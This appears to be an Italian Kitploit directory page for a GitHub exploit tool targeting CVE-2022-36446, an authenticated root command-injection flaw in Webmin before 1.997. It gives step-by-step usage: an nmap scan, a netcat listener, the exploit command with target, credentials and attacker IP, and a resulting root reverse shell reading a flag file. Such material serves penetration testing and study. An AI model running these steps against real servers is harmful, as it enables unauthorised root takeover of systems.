Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-36446-Webmin-RCE — Exploit di remote code execution autenticato per Webmin < 1.997 tramite il modulo Software Package Updates. Inietta comandi arbitrari come root attraverso un parametro non sanificato, fornendo una reverse shell. | Kitploit
Strumenti/GitHubGitHub/darnabin/cve-2022-36446-webmin-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubdarnabin/cve-2022-36446-webmin-rce

CVE-2022-36446-Webmin-RCE

Exploit di remote code execution autenticato per Webmin < 1.997 tramite il modulo Software Package Updates. Inietta comandi arbitrari come root attraverso un parametro non sanificato, fornendo una reverse shell.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
22 mesi faNon ancora revisionato
Condividi

CVE-2022-36446 — Webmin < 1.997 RCE (Autenticato)

Exploit per la vulnerabilità di Remote Code Execution in Webmin versioni precedenti a 1.997, attraverso il modulo Software Package Updates.

Come funziona?

Il modulo Software Package Updates di Webmin non sanifica correttamente il parametro u prima di passarlo al sistema. Un utente autenticato con accesso a quel modulo può iniettare comandi arbitrari che vengono eseguiti come root.


Prerequisiti

Installa le dipendenze prima di eseguire l'exploit:

root@kitploit:~
pip3 install requests beautifulsoup4 lxml urllib3

Parametri

ParametroDescrizioneEsempio
-tURL del target (senza porta)https://192.168.1.10
-uUtente di Webminadmin
-pPassword di Webminpassword123
-lLa tua IP (dove ricevi la shell)192.168.1.5
-lpPorta su cui ascolti4444

Passo dopo passo

1 — Identifica l'IP del target con Nmap:

root@kitploit:~
nmap -sV TARGET_IP
# Cerca la porta 10000 con Webmin

2 — Apri il listener sulla tua macchina:

root@kitploit:~
nc -lvnp 4444

3 — In un'altra finestra di terminale, esegui l'exploit:

root@kitploit:~
python3 exploit.py \
  -t https://TARGET_IP \
  -u admin \
  -p PASSWORD \
  -l TU_IP \
  -lp 4444

4 — Se l'exploit ha successo vedrai:

5 — Nel listener riceverai una shell come root:

root@kitploit:~
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}

Esempio completo

root@kitploit:~
# Terminale 1
nc -lvnp 4444

# Terminale 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444

Riferimenti

  • CVE: CVE-2022-36446
  • CVSS Score: 9.9 (Critico)
  • Versione vulnerabile: Webmin < 1.997
  • Exploit original: https://www.exploit-db.com/exploits/50998
  • Autore originale: Emir Polat
Scarica lo strumento